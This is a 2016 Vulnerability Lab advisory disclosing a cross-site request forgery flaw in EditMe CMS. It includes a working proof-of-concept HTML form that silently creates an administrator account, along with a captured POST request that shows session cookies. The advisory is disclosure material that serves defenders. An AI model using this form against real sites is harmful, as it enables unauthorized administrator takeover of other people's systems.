144 lines
No EOL
6.5 KiB
Text
144 lines
No EOL
6.5 KiB
Text
Document Title:
|
|
===============
|
|
EditMe CMS - CSRF Privilege Escalate Web Vulnerability
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
https://www.vulnerability-lab.com/get_content.php?id=1996
|
|
|
|
|
|
Release Date:
|
|
=============
|
|
2016-11-14
|
|
|
|
|
|
Vulnerability Laboratory ID (VL-ID):
|
|
====================================
|
|
1996
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
2.8
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
EditMe is a framework that serves as a Platform as a Service to build custom Web Applications, Web Prototyping,and Web CMS.
|
|
CMS in which any page can be a server side script that implements whatever dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or IDEs required. EditMe's API uses server-side JavaScript and our templates use XML, so there are no new languages to lear.
|
|
|
|
(Copy of the Vendor Homepage: http://www.editme.com/ )
|
|
|
|
|
|
Abstract Advisory Information:
|
|
==============================
|
|
An independent vulnerability laboratory researcher discovered a csrf privilege escalate web vulnerability in the official EditMe content managament system.
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2016-11-14: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Discovery Status:
|
|
=================
|
|
Published
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
Medium
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
A cross site request forgery vulnerability has been discovered in the official EditMe content managament system.
|
|
The vulnerability allows to perform malicious client-side web-application requests to execute non-protected functions
|
|
with own web context.
|
|
|
|
In the absence of security token, an attacker could execute arbitrary code in the administrators browser to gain
|
|
unauthorized access to the administrator access privileges.
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
Cross site request forgery web vulnerability can be exploited by malicious web application without privileged user account and without user interaction.
|
|
To demonstrate safety or reproduce csrf web vulnerability information and follow the steps below to continue provided.
|
|
|
|
|
|
--- PoC: CSRF Exploitation ---
|
|
<html>
|
|
<h2>Privilege Escalate CSRF Vulnerability</h2>
|
|
<form action="http://localhost/_Register" method="post">
|
|
<input name="mode" value="AdminAdd" type="hidden">
|
|
<input name="redirect" value="" type="hidden">
|
|
<td><select name="user-groupname">
|
|
<option value="A"selected="">Administrator</option></select></td>
|
|
<input name="user-username" value="VulnerabilityLab" type="hidden">
|
|
<input name="user-password" value="1234" type="hidden">
|
|
<input name="user-password2" value="1234" type="hidden">
|
|
<input name="user-email" value="tested@live.fr"type="hidden">
|
|
<input class="button" style="font-size:110%" name="regSubmit" value="Save" type="submit">
|
|
</form>
|
|
</html>
|
|
|
|
|
|
--- PoC Session Logs [POST]---
|
|
Status: 200 [OK]
|
|
Host: pentest.editme.com
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie: __utma=164978144.641387690.1478254033.1478262268.1478328738.3; __utmz=164978144.1478328738.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); km_lv=x; km_ai=i3E6P9IiO690CMxX353C5RCJAVY%3D; km_uq=; __utma=1.330307796.1478254213.1478254213.1478329355.2; __utmz=1.1478254213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=164978144.3.10.1478328738; __utmc=164978144; JSESSIONID=377D65CA3361D7998A1173C97420C846; visited=" Home 404"; __utmb=1.24.10.1478329355; __utmc=1; __utmt=1; editme-user=admin; editme-key="ECiu7PBk57GYeaLPUxHeDw=="
|
|
Connection: keep-alive
|
|
Upgrade-Insecure-Requests: 1
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 153
|
|
-
|
|
POST Method: mode=AdminAdd&redirect=&user-groupname=A&user-username=VulnerabilityLab&user-password=1234&user-password2=1234&user-email=tested%40live.fr®Submit=Save
|
|
|
|
|
|
|
|
Security Risk:
|
|
==============
|
|
The security rsik of the client-side cross site request forgery web vulnerability in the application is estimated as medium. (CVSS 2.8)
|
|
|
|
|
|
Credits & Authors:
|
|
==================
|
|
ZwX - (http://zwx.fr/) )[http://www.vulnerability-lab.com/show.php?user=ZwX]
|
|
|
|
|
|
Disclaimer & Information:
|
|
=========================
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
|
|
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
|
|
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
|
|
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
|
|
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
|
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
|
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
|
|
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
|
|
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
|
|
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
|
|
|
|
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
|
SERVICE: www.vulnerability-lab.com |